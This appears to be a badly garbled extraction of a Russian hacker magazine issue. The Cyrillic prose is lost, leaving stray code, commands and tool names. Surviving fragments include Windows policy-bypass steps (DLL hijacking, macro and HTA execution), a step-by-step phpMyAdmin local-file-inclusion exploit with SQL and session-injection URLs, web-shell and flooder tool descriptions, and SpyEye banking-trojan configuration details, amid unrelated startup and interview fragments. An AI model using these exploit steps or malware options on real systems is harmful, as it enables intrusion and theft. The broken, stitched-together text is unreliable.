, . , .
,
, , ( Software
Restriction Policies). ?
. , ,

, . , , ,
. .
. , .
,
gpedit.msc (secpol.msc).
. , .

1.
, ?
:
1. .
2. - .
3.
.
4. ,
.


Win+U + Help + Jump to url = Explorer

, :
. .
5 .
, !
,
:
1. - .
2. .
3. - .

. .
,
(, ).

,
(
). .
, - ,
.
, . , , .

2. ?
, , ,
, .
, .
, , , .

( ):
:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\
HKEY_LOCAL_MACHINE\Software\Policies\
:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
HKEY_CURRENT_USER\Software\Policies\
- , (
userspace) (
advapi.dll) ,
/ .
, - ,
. ? , .
, .
! : -
,


3. SRP
,
SRP (Software Restriction Policies). ,
,
, . Blacklist Whitelist
,
: ( ), . ,
SRP,
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\TransparentEnabled 0, , ,
. , ,
. (goo.gl/KNauh)
2005 SRP
GPdisable. DLL- , DLL.
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\TransparentEnabled, SRP,
STATUS_OBJECT_NAME_NOT_FOUND. , , SRP .
Sysinternals GPdisable
( -
(bit.ly/nnzjN9). .
GPCul8or (bit.ly/nJAYri) Eric Rachner , . ?
GPCul8or
(DisableTaskMgr, ProxySettingsPerUser )
. ,
. RegMon , ,
Policies.

(goo.gl/LE1M0). bpmtk (Basic Process
Manipulation Tool Kit),
.

4. BINARY PLANTING
GPdisable :
gpdisable.exe DLL ;
gpdisable.dll DLL SRP.
, ,
SRP ( GPdisable, bpmtk,


SRP

GPCul8or ).
.
DLL ( gpdisable.dll). .
DLL,
,
. !
Acros
Security (bit.ly/ov7EAz), (
, ) .
Binary planting (
dll hijacking), :
?.
(
Word), , DLL SRP. , dll hijacking
Acros GPdisable:



, Citrix XenApp.
? XenApp, , ( ). ,
- , .
. Citrix-
. -
. ,
Citrix-.
, ( ),
.
, , , (
, ). ,
,
, . , -
. ( , ),
: Citrix-
<Ctrl+Shift+Esc> Citrix-,
,
. Citrix.


Runas

1. gpdisable.dll ehTrace.dll.
2. .{2E095DD0-AF56-47E4-A099EAC038DECC24} ( , ).
3. ehTrace.dll .
4. Word, Excel ,
, PDF.
5. .
6. .
DLL!
8. , .

5.
,
, :
, SYSTEM;
;
Microsoft Office;
,
(Common Language Runtime).
, SYSTEM . :
- , ,
. , Win+U
( ). Utilman.exe ( ) SYSTEM.
. ,
c SYSTEM.
( Vista), Jump to url, C:\ explorer. ,
(View Source) ,
. ,
.

Microsoft Office. . . (
SRP), , , ,
. - exe.
:
Sub GOSHELL()
Shell "C:\windows\system32\regedit.exe", vbNormalFocus
End Sub


, , exe.
(goo.gl/kSPK3). MS Excel VirtualAlloc,
WriteProcessMemory CreateThread,
. DLL
, DLL , cmd.exe. ,
ReactOS. , SRP
DLL ( ),
,
LoadLibraryEx LOAD_IGNORE_CODE_AUTHZ_LEVEL
LoadLibrary, dll
white- !

6.
, ,
.
. ,
SRP.
. , , . , , ,
%TEMP% exe,
:
Set TEMP C:\
C:.
, ,
exe-:

, .
C:\windows\
system32\spool\Printers C:\windows\temp.
- , , , SRP . ,
, ,
AccessChk (goo.gl/jQ9tt).

7.
,
. ,
, . :
1. <Shift> + ,
Run as.
2. : runas /noprofile <
exe->.
, ,
, . ! . .
test_gpo3 regedit -
. , test_gpo2 exe (
),
regedit. ,
( RDP, ), ,
(
bit.ly/pXsBj6).

8. HTA
%HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot%
%HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot%*.exe
%HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot%System32\*.exe
%HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir%
Windows Program
Files .

,
. c , SRP-. ,

(goo.gl/BmBsm) HTA (HTML Application).
, :
1. :
<HTML>
<script language="vbscript">
msgbox "I'm dangerous VB Code!!!"
</script>
</HTML>
2. .hta (, execute_this.hta).
3. .
4. hta .
, MessageBox
VB- ? SRP , ,
. -
. HTA REG, MSC, HTA, CHM.
com= (
, ). ,
DOS.


, . . , ,
.

.

, . z


Pr0xor Kotov (https://rdot.org/forum/)

LOCAL/
REMOTE FILE
INCLUDE

,

LFI/RFI PHP-

include(_once) require(_once).

PHP-
, ,

.

LINKS
www.php.net/
set_include_path

set_include_path();
www.php.net/
unserialize

unserialize();
www.php.net/
virtual
virtual();
www.php.net/__
autoload
__autoload;
bit.ly/nWyefG
rdot.
org,

__autoload ;
bit.ly/pdY5zS

spl_autoload();
www.phpmyadmin.
net
phpMyAdmin;
bit.ly/nV1niG
LFI-
phpMyAdmin.

SET_INCLUDE_PATH()
, , set_
include_path(),
include_path
include(_once)/require(_once). , PHP-
,
include_path, .
,
set_include_path ( ini_set('include_path', []),
, include.
PHP-,
:
set_include_path($path . PATH_SEPARATOR . get_include_path());
include "myclass.php";

DVD




.

,
$path. , , , - ,
. ,
. ,
myclass.php .


, set_include_path(), ,
,
file manipulation (
), :
1. /tmp myclass.php (
777).
2. $path = /tmp/.
3. , , myclass.php /tmp.
, , ,
,
.
:
PHP-, ,
- PHP
- ,
www/nobody/apache. file
manipulation,
, ,
PHP.


, include(_once)/require(_once),
.
, PHP >= 5.1.2
__autoload,
include .
,
PHP:
If the class name is used e.g. in call_user_func()
then it can contain some dangerous characters such as ../.
It is recommended to not use the user-input in such functions
or at least verify the input in __autoload().
,
, , LFI/RFI. ,
/etc/passwd:
function __autoload($class_name) {
require_once $class_name . '.php';
}
call_user_func(array("../../../etc/passwd\0","test"));
, call_user_func() ,
.
unserialize(),
,
call_user_func().
.
, ,
- ../../../etc/
passwd.
, .

set_include_path() + __autoload()
set_include_
path(),
.
, - __
autoload, set_include_path() unserialize():


- spl_autoload() 80vul.com

function __autoload($class_name)
{
include $class_name;
}
...
set_include_path($path.PATH_SEPARATOR . get_include_path());
...
$cookie = unserialize($_COOKIE['auth']);
,
$path. , $path /etc/
auth O:7:"hosts":0:{},
/etc/hosts. PHP, rdot.org ( ). __autoload,
SPL-,
spl_autoload, , 2009 .
80vul.com:
<?php spl_autoload('info', '.txt'); ?>
info.txt.

VIRTUAL
PHP-, ,
virtual().
, <!--#include
virtual...--> mod_include, Apache. CGI, shtml- ,
Apache. PHP- .
:
<?php virtual('info.php'); ?>

info.php.

GOOGLE CODESEARCH

google.com/codesearch, lang:^php$
: set_
include_path(), __autoload, spl_autoload(), virtual() unserialize().



$this->error_config_file = false;
$this->source_mtime = filemtime($this->getSource());
}

( PHP)
-.
,
phpMyAdmin was
unable to read your configuration file! Parse error,
include.

PHPMYADMIN

LFI phpMyAdmin sql.php

, virtual spl_autoload
, callback.
, virtual :
<?php
$path = 'virtual';
$path('myclass.php');
?>
... call_user_func():
<?
call_user_func('virtual', 'myclass.php');
?>

EVAL == EVIL
,
, eval('?>' . trim(file_get_contents('info.txt'))).
, , include/require, .
-, ,

. -, file_get_contents()
eval() allow_url_include, ,
allow_url_fopen = On (
), .
,
phpMyAdmin <=
2.11.9 unserialize() arbitrary PHP code execution exploit (bit.ly/qW94f9).
phpMyAdmin

unserialize(), load
PMA_Config .
load:

, ,

phpMyAdmin. , phpMyAdmin
, ][
. , , , , ,
.
, ./
libraries/display_tbl.lib.php. phpMyAdmin
3.3.10.1 3.4.3 .

Security (PMASA-2011-8).

:
advisory, , 3.3. (
,
).
:
./libraries/display_tbl.lib.php (phpMyAdmin 3.3.10)
if ($GLOBALS['cfgRelation']['mimework']
&& $GLOBALS['cfg']['BrowseMIME']) {
if (isset($GLOBALS['mime_map'][$meta->name]['mimetype']) ... ) {
...
-$include_file = $GLOBALS['mime_map'][$meta->name]
['transformation'];
+$include_file = PMA_securePath($GLOBALS['mime_map'][$meta->name]
['transformation']);
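Review bot: on the added `$include_file = PMA_securePath(...)` line, the patch relies on a helper whose body is not part of this hunk, so the diff alone does not confirm that every traversal form is rejected before the value reaches `require_once './libraries/transformations/' . $include_file;`. Suggest also checking the result against the files that actually exist in ./libraries/transformations/ (an allowlist), and adding a comment that `transformation` is read from a database column and must be treated as untrusted input.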

$eval_result =
eval('?>' . trim(implode("\n", file($this->getSource()))));
...
if ($eval_result === false)
$this->error_config_file = true;
else
{


__autoload php.net


phpMyAdmin

...
require_once './libraries/transformations/' . $include_file;
,
:
1. $GLOBALS['cfg']['BrowseMIME'] == true. , , ./libraries/config.
default.php
true. .
config.default.php, .
2. $GLOBALS['cfgRelation']
$GLOBALS['mime_map']. $cfgRelation
, ,
, .
, PMA_getRelationsParam(),
, , ./libraries/relation.
lib.php:
function PMA_getRelationsParam($verbose = false)
{
if(empty($_SESSION['relation'][$GLOBALS['server']]))
{
$_SESSION['relation'][$GLOBALS['server']] =
PMA__getRelationsParam();
}
$GLOBALS['cfgRelation'] = $_SESSION['relation'][$GLOBALS['server']];
...
return $_SESSION['relation'][$GLOBALS['server']];
}
$_SESSION relation[$GLOBALS
['server']], PMA__
getRelationsParam. ,
. PMA__getRelationsParam
$cfgRelation,
$cfg['Servers'][$i]['pmadb'].
,
$cfgRelation false null.
$cfg['Servers'][$i]['pmadb']
, $cfgRelation . ,
$GLOBALS['cfgRelation']
,


$_SESSION phpmyadmin (
-,
$cfg['Servers'][$i]['pmadb']).
,
$_SESSION parse_str(), Mango,
phpMyAdmin,
. $cfgRelation .
, ,
$GLOBALS['server']. ,
. phpMyAdmin
, 1.
, , ,
, phpMyAdmin':
'pmaUser-' . $GLOBALS['server'] 'pmaPass-' . $GLOBALS['server'].
.
$GLOBALS['mime_map'] PMA_
getMIME():
./libraries/transformations.lib.php
function PMA_getMIME($db, $table, $strict = false)
{
...
$com_qry = '
SELECT `column_name`,
`mimetype`,
`transformation`,
`transformation_options`
FROM ' . PMA_backquote($cfgRelation['db']) .
'.' . PMA_backquote($cfgRelation['column_info']) . '
WHERE `db_name` = \'' . PMA_sqlAddslashes($db) . '\'
AND `table_name` = \'' . PMA_sqlAddslashes($table) . '\'
AND ( `mimetype` != \'\'' . (!$strict ? '
OR `transformation` != \'\'
OR `transformation_options` != \'\'' : '') . ')';
return PMA_DBI_fetch_result($com_qry, 'column_name',
null, $GLOBALS['controllink']);
}
, $GLOBALS['mime_map']
,
. , . ,
PMA_displayTableBody.



, table_name .

PMA_getMIME $GLOBALS['mime_map'].
2. $_SESSION['relation'] $cfgRelation.
.
PMA,
:
http://phpMyAdmin/index.php?token=< >
&session_to_unset=<*x*>&_SESSION[relation][1][commwork]=1
&_SESSION[relation][1][mimework]=1&_SESSION[relation][1]
[db]=test&_SESSION[relation][1][column_info]=pmatest

.
3. , http://
phpMyAdmin/sql.php?db=test&table=integer&token=< >.
, integer a /etc/hosts.
__autoload

, sql.php:
//
require_once './libraries/display_tbl.lib.php';
...
// , $cfgRelation
if (strlen($db)) {
require_once './libraries/relation.lib.php';
$cfgRelation = PMA_getRelationsParam();
}
...
PMA_displayTable($result, $disp_mode, $analyzed_sql);
PMA_displayTable ./libraries/display_
tbl.lib.php, , ,
PMA_displayTableHeaders, $GLOBALS['mime_map'].

:
,
:
1. phpMyAdmin .
, sql.php :
CREATE TABLE 'test'.'integer' ( '1' INT NOT NULL ) ENGINE = MYISAM ;
INSERT INTO 'test'.'integer' ( '1' ) VALUES ( '1' );

$GLOBALS['mime_map']:
CREATE TABLE 'test'.'pmatest' ( 'column_name' INT NOT NULL ,
'mimetype' INT NOT NULL , 'transformation' TEXT NOT NULL ,
'transformation_options' INT NOT NULL , 'db_name' TEXT NOT NULL,
'table_name' TEXT NOT NULL ) ENGINE = MYISAM ;
INSERT INTO 'test'.'pmatest' ('column_name', 'mimetype',
'transformation', 'transformation_options', 'db_name',
'table_name') VALUES ('1', '1', '../../../../../../../../etc/hosts',
'1', 'test', 'integer');
transformation
, db_name ,



, ,
3.4.x- phpMyAdmin 3.4.3.1
.
advisory PMASA-2011-10. , , ,
sql.php:
$mime_map = PMA_getMIME($db, $table);
...
foreach($mime_map as $transformation) {
$include_file = $transformation['transformation'];
...
if (file_exists('./libraries/transformations/' . $include_file)) {
$transformfunction_name = str_replace('.inc.php', '',
$transformation['transformation']);
...
require_once './libraries/transformations/' . $include_file;
,
:
1. $GLOBALS['is_ajax_request'] == true . ,
ajax_request.
2. 0 == $num_rows || $is_affected. : ,
- sql-. ,
(
).
, ,
PMA_getMIME $mime_map
phpmyadmin $_SESSION.
phpmyadmin phpMyAdmin 3.4.3.1,

.
,
phpMyAdmin 3.4.3:
1. phpMyAdmin :
CREATE TABLE 'test'.'pmatest' ( 'column_name' INT NOT NULL ,
'mimetype' INT NOT NULL , 'transformation' TEXT NOT NULL ,
'transformation_options' INT NOT NULL , 'db_name' TEXT NOT NULL,
'table_name' TEXT NOT NULL ) ENGINE = MYISAM ;


LFI- phpMyAdmin

INSERT INTO 'test'.'pmatest' ('column_name', 'mimetype',


'transformation', 'transformation_options', 'db_name',
'table_name') VALUES ('1', '1', '/../../../../../../../etc/hosts',
'1', 'test', '< , >');
2.
$cfgRelation:
http://phpMyAdmin/index.php?token=< >
&session_to_unset=<*x*>&_SESSION[relation][1][commwork]=1
&_SESSION[relation][1][mimework]=1&_SESSION[relation][1][db]=test
&_SESSION[relation][1][column_info]=pmatest
3. :
http://phpmyadmin/sql.php?do_transformations=1&ajax_request=1
&table=< >&db=test&token=< >
, , ,
$cfgRelation.
,


phpMyAdmin shared-. :
, ,

MySQL phpMyAdmin.


, . , ,
, / ,
. ,
PHP,

.
,
, phpMyAdmin, . ,
.
, .
, ,
, . z


/ X-TOOLS

(icq 884888, http://snipper.ru)

X-Tools

:
Windows 2000/
XP/2003 Server/
Vista/2008 Server/7

:
*nix/win

:
Windows 2000/
XP/2003 Server/
Vista/2008 Server/7

:
profexer

:
c0n Difesa

:
Zdez Bil Ya

DEFBRUTE

PHP-- P.A.S.

ICQ SMS-

defbc.exe <server ip> <server port>


-. . : P.A.S. (php web-shell)
rdot.org profexer.
,
:
1. .
2.
: bit.ly/r36L3k
.
1.
3. , , ,
.
4. SQL- MySQL, MSSQL, PostgreSQL,
.
5. Bind port (Perl).
6. Back-connect (Perl).
7. Port scanner (PHP).
8. BruteForce /etc/passwd SSH,
FTP, POP3, MySQL, MSSQL, PostgreSQL
.
9. PHP-
.
10. (15 ).

www.defec.ru/node/4
.

,
:
.

Zdez Bil Ya.


, ICQ sms flooder ,
ICQ. :
,
;
ICQ 5 ;
(** ,
icq) **;
;
( ).
,
, 160
() 70 (, ).

.
, ICQ,
sms,
.
.
ICQ sms
check SMS.
:
, ,

,
.


MD5-.

, . ,

- ?

. .
,

,
.
, DefBrute
MD5-.
.
(DefBrute v1.0.exe)
, . DefBrute ,
:


:
Android

FACENIFF:

:
bponury

FaceNiff
Firesheep,
HTTP-
.
Firesheep Firefox,
Facebook, Twitter,
Flickr Amazon.com ,
.

, .
FaceNiff
Firesheep
! -, apk- (faceniff.ponury.net),

:
Windows 2000/
XP/2003 Server/
Vista/2008 Server/7

:
Windows 2000/
XP/2003 Server/
Vista/2008 Server/7

:
Windows 2000/
XP/2003 Server/
Vista/2008 Server/7

:
SLESH

:
Flame of Soul

:
xmadstyle

MICSPY SE
, X-Tools

MicSpy .

MicSpy SE
(Stream Edition).
,
, , .

:
;
;
:
UPX
- 5632 ;

;

WinAmp;

256 .
, : ,

http://[IP ]:4545.
back
connect' .


Android-
-
: FaceBook, Twitter,
. . 10. , ,

( : bit.ly/qbzwGh). ,
,

.
FaceNiff Android
-. , (WEP,
WPA WPA2).
EAP.

EMAIL- XSPRYT

MD5
ONLINE SCANNER


XSpryt.

email-
, , .
, !
:
;
-;
;
( );
;
;

.
:
1. exe-.
2. ,
.

: grabber.exe -h
winne.com -p 80 -t 3000. :
h ( http://);
p ;
t - .
mail.
txt; ,
, link.txt.

MD5 MD5 Online Scanner,


xmadstyle -.
,
MD5- -.
:
( 250 );

;
-
;

;

;
GUI, .
, : c0llision.net, tmto.org, www.md5this.
com, md5.hashcracking.com, md5online.net,
hashkiller.com 30 .
,
:
[MD5] ;
[DATA] (, . .);
[TEXT] ();
[SERVICE] , .


MALWARE

SPYEYE



SpyEye.
,
, . , SpyEye
, .

INFO
SpyEye
v1.3.25
14.03.2011.


,
,
,

.



:
.
DDoS, ,
. SpyEye
, . SpyEye ,
.


SpyEye (,
, , ). , .
,
. - ,
.
10 %.
. SpyEye .
,
. /
, -
.
.
SpyEye GNU/Linux Debian 5.0.
-
, ssh- .
VirtualBox.

, . - PHP,
MySQL-.
. .
gate.php.


BackConnect Server (for SOCKS5 & FTP).


SOCKS5 FTP,
BackConnect- GNU/Linux.
Collector.
GNU/Linux, .
, ,
TCP Sausages.
LZO-.

MySQL. ,
GNU/Linux MySQL. ,
SSH- .
RDP BackConnect Server.
OS GNU/Linux.

MySQL.


1. Formgrabber CP (Collectors GUI). ,
PHP, .
,
. .
2. Builder. ,
exe- . :
Encryption key , config.bin.
.
Clear cookies every startup ,
( ) cookies IE FF.
FF , cookies ,
FF cookies cookies.sqlite.
Delete non-exportable certificates
Windows ( IE)
. , ,
, *.pfx, .
SpyEye .
,
.
, .
Dont send http-reports HTTP- . , HTTPS-
( HTTP- Basic-).
Compress build by UPX ,
UPX.
, .
Make build without ZLIB support HTTP 1.0 FF-
Accept-Encoding, -
( gzip, deflate).
SpyEye zlib,
. zlib.
1516 K (
UPX ). ,
FF, .
Make LITE-config ,
config.bin , webinjects, screenshots
( customconnector.dll). ,
config.bin .
, .


.


.
EXE name ( ).
Mutex name mutex,
.
Anti-Rapport , Rapport Trusteer. ,
SpyEye Rapport . ,
. ,
, Rapport,
Zeus . RKU,
,
Anti-Rapport.
Screenshots.
screenshots. .
. .
,
, .
:

%URL_MASK% %WIDTH% %HEIGHT% %MINIMUM_CLICKS%


%MINIMUM_SECONDS%
URL_MASK URL. URL , ,
.
, .
,
(,
). : -

FTP


, Hooked Function:
GRABBED DATA. . .)
H L ,
data_before data_after.

data_before, data_inject, data_after


:
1. data_before
data_after , ...
data_inject data_before.
2. data_after
data_before , ...
data_inject data_after.
3. data_before data_after,
... data_before
data_after data_inject.


( ,
HTTP-, URL_MASK)
.
Client : Builder : webinjects. webinjects.
HTTP/HTTPS-.
, Zeus. set_url. ,
Zeus.
: set_url, data_before,
data_inject, data_after ( data_end , data_):
set_url
, . Zeus,
, * #.
(
G):
G ,
, GET.
P ,
, POST.
L data_before data_after
.
data_inject. (


- BOA HTTP 1.0 (
HTTP SpyEye
Mozilla Firefox). (*.css, *.js)
- , ContentEncoding , .
, ,
Invalid Content, .
-, SpyEye,
( data_before, data_inject data_after)
css- js-.
Builder: serial.txt.
,
. : !
Client : Builder : collectors.txt.
collectors.txt. , (
Enter):
ip:port IP, SpyEye Collector
PORT,
. IP . ,
, - , (80 443),

.

, , (
0,1 ).
,

.

SPYEYE
ZEUS
data_before, data_inject, data_after SpyEye
, Zeus . Zeus
CSS- JS-. ,
SpyEye, , set_url .css .js ( ).
SpyEye H Zeus
HTML- HTTP-. SpyEye #
* ( set_url). Zeus #
.



. .
Client : Plugins : webfakes. webfakes HTTP- HTTPS-
- IE
FF.
, Zeus,
:
entry "WebFakes"
%URL_MASK% %URL_REDIRECT% %FLAGS% %POST_BLACK_MASK%
%POST_WHITE_MASK% %BLOCK_URL% %WEBFAKE_NAME%
%UNBLOCK_URL%
End


FF .
API nspr4, POST-,
,
4 .
POST-,
4 HTTP- ( HTTP).
.
DDoS. , DDoS- - .
:
type target port time.
type target port time.
type DDoS. :
slowloris/ssyn/udp.
target IP ,
.
port , DDoS ( UPD DDoS
0, ).
time , DDoS ( UDP/SSYN ,
Slowloris ).
DDoS (
, ). DDoS Slowloris
( 80-).
.
Client : Plugins : ccgrabber.
, POST-
.
Luhn algorithm.
, POST- .
CC
.
ffcertgrabber. SpyEye
Windows. Firefox
.
FF.
, .
( ).
FF.
Socks5 BackConnect. SOCKS5-
BackConnect. ,
Socks.


FTP BackConnect. FTP-


BackConnect-.
, FTP-.
RDP BackConnect. RDP-
BackConnect-. ,
RDP.

(
). Portable- TotalCommander,

( ).
.
.

(RDP).
Windows mstsc.exe Remote Desktop Connection.
:
x64-;
;
Win7 Starter ( Starter);
, !


, ,
.
.
, ,
.
, ,
. SpyEye ,
,
. SpyEye

. ,
, . z


A.I.

,


. ,

,
. - , ,
. ,
:).

, ,

,
, , .
, Anonymous LulzSec,
, , , , ,
.
,
.
, ,
, , ,
.



2000- .
, ,
.
-
,
. -
, ,
.
,
(
)
. , -.
: ,
, . ,
, ,
.
, ,
,
.
, .
,
, , ,
, , , , , 1001
. ,
, 2010
. 60 .
Trojan-Spy.
, ,
,
.
? , ,
, ,
.
,
,
- .

, ,
.
, ,
.

, ,

.


, ,
, . ,
,
, .
,
.

: , , . ,
- SpyEye Zeus,
,
,
,
-,
. . ,
. Zeus, SpyEye

.

, .
,

!
?

-
,
-


SpyEye
,


Google

,
.
,
, . ,
-, , -
.
:
, . , .
- ,
- .
- ,
. -

, . ,
, , ,
, ,
, .
. DdoS, , ,
- . .

. .
,
.
, ,
-
,
0day- Windows.
, , , , ,

(.
).
, , .
.
: , . ,
: .
, : ,
. ,
,
, ,
(,
, ?). . 10
% .
,
, , .
, ,
, (. ), FTP ( ).

, , ,

, ?!


Exp

, . , ,
, ,
. , , Zeus,
, , . !
(
) - 1000 .
, : , ,
,
.
,
, . .
, , .
,
, ,
100
. , , ,
.
,
,
, ,
, .

,
, ,
,

,
,
. ,
, , - .
() .
500 . , .
, , .
(
) - -
( -), . , . , ,
. -, ,
. ,
, ,
. 13001500 .
,
, ,
- . , ,

.
:
, ,
, (, ,
,
. . .).
, 500 .
, 800. ,
,
, ,


?
,

HOW TO NOT TO DO
, , .
( )
, :
, .
:
, . ,
:
. , :
. , ,
, .
,
. .

. : , , .


,
,


, ,
.
, , ,
, ,
. !
. , ,
,
. 200 ,
, , .
,
, - .
.

. -,
:
. :
? ,
: . .
,
, : 1000
? !.
,
.
- , , . ,
,
.
,
: , ! ,
! ! ? ?! ! , ! !
, ,
.
, , .
:
, . , ?!

, .
. 1015 % . ?

Western Union (, ,
)
-
. ,
,
.
?
. ,
,
60007000 . , 1000 ,
, , . , .
, 1015 % ,
500 000 . 7000?
, . , , ,
, ,
, ,
- .


, ,
,
. ,
27
. ? ,
.
,
, .
, ,
.
:
,
, ,
, ,
( , ,
. . .).

- , .
- :
,
. z


-
?

- : , ,

.

,
/,
.

Black Hole
.
.


(TDS),

.


-

.
Black Hole
Paunch
.


, , ,
, .
Black Hole
. $1500,
$ 1000 $ 700.

BlackHole Exploit Kit 1.0.2


,
thehackernews.
com. 2
ZeuS.


7
,
273 .


Mifrill (mifrill@gameland.ru)

, , ,
.

,
. ! ,

.
,

, .
!



: Facebook ,
Amazon , Twitter
.
, ,
.
.
, ,
, , ,
. ,
, 90 100
, ,
.
. ,
.
,
.
, , ,
, Apple

. ,
.

,
,
,
? -,
,
,
? ,
,
,
, ?


. ,
,
.
. , ,
, ,
.
,
, ,
,

, .



Startup Weekend

SumIT

Startup Point

:
: russia.startupweekend.org
: ,
:

:
: sumit.ru
: -
:

: Startup Point
: startuppoint.ru
:
:

Startup Weekend, ,
.
,
,
-, ,
IT .
, . .
,
, . , 12-
-,
, - ,
$100 000
.
( 75 %
). .


2500 ,
250 , 100 , 120
. SumIT
. ,
. SumIT
Weekend, Startup
Marathon. ,

. -
,
IT-,
SumIT. Invest Fest, . Invest
Fest -
IT-: Runa Capital, Almaz, ABRT, , Mail.
ru Group, EMC, Intel, , RSV Venture Partners.

Startup Point

-
,
10 000 , 2500+
, 200+
. Startup Point $3
.
.
, ,
.
, , .
Elevator Pitch
(2- )
Success
Story.
. , ,
.


Almaz Capital Partners

Runa Capital

: almazcapital.com
:
: ~$100500

: runacap.com/ru
:
: $500

: company.yandex.ru/public/start/factory.xml
:
: $50100 .

Almaz Capital Partners



, 2008 .
(
Almaz Capital Partners Runa Park,
Runa Capital; 2010
; Russian
TechTour 2004). 2008 .
$125 , $60 Cisco UFG
Asset Management.
Appollo Project, Parallels .
Almaz Capital Partners
.

. 2010-
Qik ( ),
Skype 2011 $150 .


2010 .
Parallels Acronis


Almaz Capital Partners .
Runa Capital --
.
. Runa Capital
, , , . Runa Capital
20 . -,

. Runapark. Runa Capital
$1 (
).

., ,

,
-, ,
.


$50150 .
, ,
, ( , ),
, ,
,
, ,

.
,
.



, , , .
.

.
,
, , .

HackDay

Harvest

StartUp Week

: -
: hackday.ru
:
:

: GreenfieldProject
: greenfield-project.ru/harvest
:
:

: STARTeurope, Initial Factor,


: startupweek2011.com
: ,
: 3 7 2011 .


HackDay
.

2
. HackDay
Yahoo! 2005 .

-. .
, , .
, ,
- . ,
HackDay
. , HackDay , IT, , ,
, ,
.
.

Harvest
HackDay.

- .

,
. Harvest
, .
,

.
GreenfieldProject
-, ,
-.
,
.



, StartUp
Week Europe Festival

. ,

, ,
, , , .
. ,
StartUp Week 70
-,
.
: ,
EDventures Holdings, (
Skype), , last.fm,
( SeedCamp
- ),
, Almaz Partners, ,
ABR .


, .
,

, .

. .

Microsoft

ABRT Venture Fund

: ms-start.ru
:
: $30 $100 .

: glavstart.ru
:
: $100 .

: abrtfund.com/rus
:
: $1 5


2010
Microsoft .




-.
. ,

, , ..
,
.
150
,
.
$30
$100 . , $100 .
PiratePay,

.



,
.
, ,
Startup Weekend .
,
,
12
$100 . ,
,
. ,
,
Facebook .

Facebook
.



, Aelita Software,
,
2004 .
Quest Software $115 .
Aelita Software
. ABRT

.
, .
, ABRP ,

. (Mangrove
Capital Partners) (Insight Venture
Partners OpenView Venture Partners) , ,
$100 .
ABRT .



.
,
.
Facebook Google,

, .


:

? , -

,
, -
, ?

,
.
,
.
,
, ,

.
285- .
.
, .
,
Jelastic ,
Java-,
Java
(SaaS).
IT-, -,

. -, b2b-.
,
, ,
.
, , ,
.


, ,

-.
,
Runa Capital (runacap.com).



? , $50100,
? ?

, ,

?


, ,
,
,
.
-,

, .

,
.



?
,
? ,

, ?


social, local, mobile, ,
.

-,
.
.
,

Runa Capital $500 .


,
,
.
, , .


, .

,

.


.



Runa Capital .
:
Telefir (telefir.ru)
- .
, Twitter.

. , ,
.
, .
Jelastic (hivext.ru), PaaS-, Java-

.
, 3 % .
Metabar (metabar.ru)

.
,
, .
Travelmenu (travelmenu.ru)
Almaz Capital.
3
,
290 . , 100
500 .
, .
,
, ,
Alawar Qik.
Almaz Capital Skype
( $150 . . Mifrill).

IT
Q ?
, ?
, ,
?

,
,


? ,
,
, ,
.

, ,
,
Runa Capital . ,

: Parallels, Acronis,
Abby, Kaspersky. ,
.
Mail.ru Yandex
IPO .

Startup Weekend


Startup Point

.

,
, - .
,
, , ,
. , , .

. ,

STARTUP
WEEKEND, STARTUP POINT, SUMIT, HACK DAY
. .?
?

,
,


-.
,
, .

,
, , , ,
,
, ,
. , ,
, ,
...
: ? z

Startup Week


2007
.
2009
ESET
.
security: CONFidence,
CARO, PHD .

100% Virus Free Podcast.


Eset/Russia

VIRUS

FREE

ESET/RUSSIA

, ,
.
, ,
.
,
,
?

ESET.


MAN


? ,
,
? ?

, , .
-,
- 1998
.
580
( 8- 8080)
. ,

.
,
, ,

. ,
CD-ROM
13,
.
,
,


/
WinNuke, ,
, DoS
. , ,
, ,
.

, -
.
, , ,
,
.
,
Windows
.

. -
, ,
PoC perl.
,

. ,
,
,
,
,
, .
,
WinNuke, .



.
, ,
, . ,
, ,
JME,
Java.
,

, , ,
. Python,
,
. ,

, ,
++. , ++
,
Python.
, , ,
.


?
,
?

A


, ,

,
,
.
, , ,

. ,
- ,
, TLD3/4, Rovnix,
.

-,

.


?
-

?

,
, - ,
.
,

.
-,
,
PPI.

.

,

ESET LETA
GROUP, ESET?
ESET?

,
, ,
.

,
.

,

.

, : ,
, , -, -
. ,

.


?
,
?
ESET
?

, ,

NDA. ,
,
. , ,

: ,
.
, , , ,

, .

: ESET
?

?


, , ,
. ,
,

.
,
-
. , ,

,
.

?
-
?

,
:
Hex-Rays. ,
, , ,
,
,
. IDA
Pro

Hiew,
-
.
Immunity Debugger
Python API.
,
, WinDbg ( , ,
Python- pykd).
SofIce,

NT.
- Zynamics BinDiff.
,

.
,
.


-

.
?


Eset/Russia

,
,
. Wiki,

,
,

. ,
Malware Analysts Cookbook
,


,
?

,
, .
,

, - .

,
,

.

.
,

, , 27%
73% . ,
, ,
. ,

.

,
?
,

.


, ,
,
,
- ,
,
.
,
.
,
.
,
reddit Reverse
Engineering (www.reddit.com/r/
ReverseEngineering).

.
,
.


-
?


.
, ,

.

,
.
:
,
, ,

. ,


wasm.ru. , ,
, , .


?

, ,
?

?

?
, , ,
,

. , ,
, ,


,
.
,

, . ,
, -
.

, , ,
.
,

. z

,
,
.

, ,


.
,
(www.joineset.com).
,

.


, ?

,

Stuxnet Under the Microscope.


.

.

TDL3/3+/4,
,

.


?
,


(stannic.man@gmail.com)


IRP-
, ,
,
,
.

.

DVD

,
IoCallDriver, ,
!

INFO
, ,

/

TDL3 (4), ,
IoCallDriver,


.

: ,
, , ,
.
. , , .
, Microsoft
- (
MSDN: http://goo.gl/kPt8b, http://goo.gl/igD0b). ,
, TDI-,
.
NDIS-IM-,
. , ,
- .

, RKU, IoCallDriver

,
- ,
. . , Microsft WDM
: IoCreateDevice IoAttachDevice
, .
IRP-,
-, ,
, IRP-.
, , -
IRP-,
, .
, . ,
-, IoCallDriver.
, . , ,
major- ,
- IRP-.
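NTSTATUS
FASTCALL
IopfCallDriver(
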